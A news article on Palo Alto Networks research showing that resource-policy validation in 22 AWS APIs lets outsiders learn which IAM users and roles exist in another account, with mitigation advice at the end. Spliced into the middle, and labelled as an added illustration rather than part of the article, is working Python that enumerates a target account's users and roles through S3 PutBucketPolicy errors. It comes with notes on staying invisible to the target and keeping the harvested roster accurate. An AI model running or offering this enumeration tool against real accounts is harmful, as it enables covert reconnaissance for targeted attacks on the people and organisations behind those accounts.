Palo Alto Networks security researchers identified more than 20 Amazon Web Services (AWS) APIs that can be abused to obtain information such as Identity and Access Management (IAM) users and roles.
In total, the technique can be applied to 22 APIs across 16 AWS services. An attacker can use it to obtain the roster of a target account, gain a glimpse into the organization's internal structure, and use that information to launch targeted attacks against specific individuals.
According to the researchers who identified the affected APIs, the attack works across all three AWS partitions (aws, aws-us-gov and aws-cn). AWS services susceptible to abuse include Amazon Simple Storage Service (S3), AWS Key Management Service (KMS), and Amazon Simple Queue Service (SQS).
“The root cause of the issue is that the AWS backend proactively validates all the resource-based policies attached to resources such as Amazon Simple Storage Service (S3) buckets and customer-managed keys,” Palo Alto Networks explains.
Resource-based policies typically include a Principal field that specifies the users or roles allowed to access the resource. If the policy names an identity that does not exist, the API call to create or update the policy fails. An attacker can abuse this validation as an oracle: attaching a policy to a resource in their own account that names a principal ARN in the target account, the success or failure of the call reveals whether that user or role exists.
By repeatedly invoking the affected APIs with different principals, an adversary can enumerate the target account's users and roles. Moreover, the enumeration is invisible to the target account, because the API logs and error messages are available only in the "attacker's account where the resource policies are manipulated," the researchers note.
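The following is an added illustration of the principal-validation oracle described above; it is not Palo Alto Networks' tooling and not code from the article. It assumes the S3 PutBucketPolicy path: the attacker attaches a Deny-only policy to a bucket they own, naming one candidate ARN from the target account, and treats a policy-validation error as "principal does not exist". The error code checked (MalformedPolicy for S3, MalformedPolicyDocumentException for KMS) and the `FakeS3` client that stands in for boto3 so the block runs offline are assumptions made for the example; against real AWS, pass `boto3.client("s3")` and a bucket you control.

```python
"""Resource-policy principal oracle (added example, not the article's code)."""
import json
from typing import Dict, Iterable, List

# Assumption: error codes AWS returns when a Principal ARN does not resolve
# (S3 PutBucketPolicy -> MalformedPolicy; KMS PutKeyPolicy ->
# MalformedPolicyDocumentException). Any other error is re-raised, since
# AccessDenied or a throttling error says nothing about the principal.
NONEXISTENT_PRINCIPAL_CODES = {"MalformedPolicy", "MalformedPolicyDocumentException"}


def probe_policy(principal_arn: str, bucket: str) -> str:
    """Bucket policy that names one principal but grants nothing.

    A Deny on a single harmless action keeps the attacker-owned bucket closed
    while the probe policy is attached; AWS validates the Principal regardless
    of Effect, which is what makes the call usable as an oracle.
    """
    return json.dumps({
        "Version": "2012-10-17",
        "Statement": [{
            "Sid": "ProbeOnly",
            "Effect": "Deny",
            "Principal": {"AWS": principal_arn},
            "Action": "s3:GetBucketLocation",
            "Resource": f"arn:aws:s3:::{bucket}",
        }],
    })


def principal_exists(s3, bucket: str, principal_arn: str) -> bool:
    """True if PutBucketPolicy accepts the principal, False if AWS rejects it.

    `s3` is any object with a boto3-style put_bucket_policy(Bucket=, Policy=).
    A real boto3 client raises botocore.exceptions.ClientError, whose
    .response["Error"]["Code"] carries the code inspected here.
    """
    try:
        s3.put_bucket_policy(Bucket=bucket, Policy=probe_policy(principal_arn, bucket))
        return True
    except Exception as exc:  # duck-typed so the block runs without boto3 installed
        code = getattr(exc, "response", {}).get("Error", {}).get("Code", "")
        if code in NONEXISTENT_PRINCIPAL_CODES:
            return False
        raise


def enumerate_principals(s3, bucket: str, account_id: str,
                         users: Iterable[str], roles: Iterable[str],
                         partition: str = "aws") -> Dict[str, bool]:
    """Probe each candidate user and role name in the target account.

    Returns ARN -> exists. Only the attacker's own bucket is touched, so the
    target account's CloudTrail never sees these calls.
    """
    candidates: List[str] = (
        [f"arn:{partition}:iam::{account_id}:user/{u}" for u in users]
        + [f"arn:{partition}:iam::{account_id}:role/{r}" for r in roles]
    )
    return {arn: principal_exists(s3, bucket, arn) for arn in candidates}


class _FakeClientError(Exception):
    """Mimics the .response layout of botocore's ClientError (constructed)."""

    def __init__(self, code: str, message: str):
        super().__init__(f"{code}: {message}")
        self.response = {"Error": {"Code": code, "Message": message}}


class FakeS3:
    """Constructed stand-in for a boto3 S3 client so the example runs offline.

    It accepts a policy only when every Principal ARN is in `existing`,
    mirroring the backend validation the article describes.
    """

    def __init__(self, existing: Iterable[str]):
        self.existing = set(existing)
        self.calls = 0

    def put_bucket_policy(self, Bucket: str, Policy: str) -> None:
        self.calls += 1
        for stmt in json.loads(Policy)["Statement"]:
            if stmt["Principal"]["AWS"] not in self.existing:
                raise _FakeClientError("MalformedPolicy", "Invalid principal in policy")


if __name__ == "__main__":
    # Constructed target: account 123456789012 has user "alice" and role "Admin".
    target = "123456789012"
    fake = FakeS3([f"arn:aws:iam::{target}:user/alice",
                   f"arn:aws:iam::{target}:role/Admin"])
    found = enumerate_principals(fake, "attacker-probe-bucket", target,
                                 users=["alice", "bob"], roles=["Admin", "Deploy"])
    for arn, exists in found.items():
        print(("EXISTS  " if exists else "absent  ") + arn)
```

Two practitioner notes. First, the probe policy is Deny-only so that a bucket the attacker controls never ends up granting the probed principal anything. Second, only the policy-validation error code is treated as a negative answer; AccessDenied, throttling or a missing bucket are re-raised rather than silently counted as "does not exist", which would otherwise poison the roster.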
Detecting and preventing such an attack is difficult, not least because the adversary is under no time pressure and can perform reconnaissance against random or specifically targeted AWS accounts at leisure.
IAM security best practices that Palo Alto Networks recommends for mitigating the issue include: removing inactive users and roles to reduce the attack surface; making usernames and role names harder to guess by appending random strings to them; logging and monitoring identity authentication activity; using two-factor authentication (2FA); and logging in through an identity provider and federation.
“Good IAM security hygiene can still effectively mitigate the threats from this type of attack. Although it’s not possible to prevent an attacker from enumerating identities in AWS accounts, the enumeration can be made more difficult and you can monitor for suspicious activities taken after the reconnaissance,” the researchers note.
Related: AWS Network Firewall Now Generally Available
Related: AWS Fraud Detection Service Becomes Generally Available
Related: AWS Security Service ‘Amazon Detective’ Now Generally Available

More from Ionut Arghire